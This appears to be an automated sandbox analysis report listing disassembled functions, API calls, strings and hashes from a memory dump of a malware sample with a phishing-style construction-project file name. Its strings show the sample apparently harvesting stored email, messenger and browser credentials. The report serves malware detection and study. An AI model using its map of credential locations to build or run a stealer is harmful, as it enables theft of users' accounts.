                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID: global-salt$password-check
                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                          Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                          • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                          Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 438689982-0
                                                                                                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                          Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                          • memset.MSVCRT ref: 0040330B
                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                          • strchr.MSVCRT ref: 0040335A
                                                                                                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                          • strlen.MSVCRT ref: 0040339C
                                                                                                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                          • String ID: Personalities
                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                          • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                          • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                          Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00444573
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                          • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                          • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                          Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: H
                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                          Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                          Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: winRead
                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                          Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                          Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4247780290-0
                                                                                                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                          Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                          • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi$_mbscpy
                                                                                                                          • String ID: smtp
                                                                                                                          • API String ID: 2625860049-60245459
                                                                                                                          • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                          • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                          Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          • memset.MSVCRT ref: 00408258
                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                          Strings
                                                                                                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$EnumOpenmemset
                                                                                                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                          • API String ID: 2255314230-2212045309
                                                                                                                          • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                          • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                          Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C28C
                                                                                                                          • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FocusMessagePostmemset
                                                                                                                          • String ID: S_@$l
                                                                                                                          • API String ID: 3436799508-4018740455
                                                                                                                          • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                          • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                          Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy
                                                                                                                          • String ID: C^@$X$ini
                                                                                                                          • API String ID: 714388716-917056472
                                                                                                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                          • String ID: MS Sans Serif
                                                                                                                          • API String ID: 3492281209-168460110
                                                                                                                          • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                          • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                          Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_strcmpimemset
                                                                                                                          • String ID: edit
                                                                                                                          • API String ID: 275601554-2167791130
                                                                                                                          • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                          • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                          Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
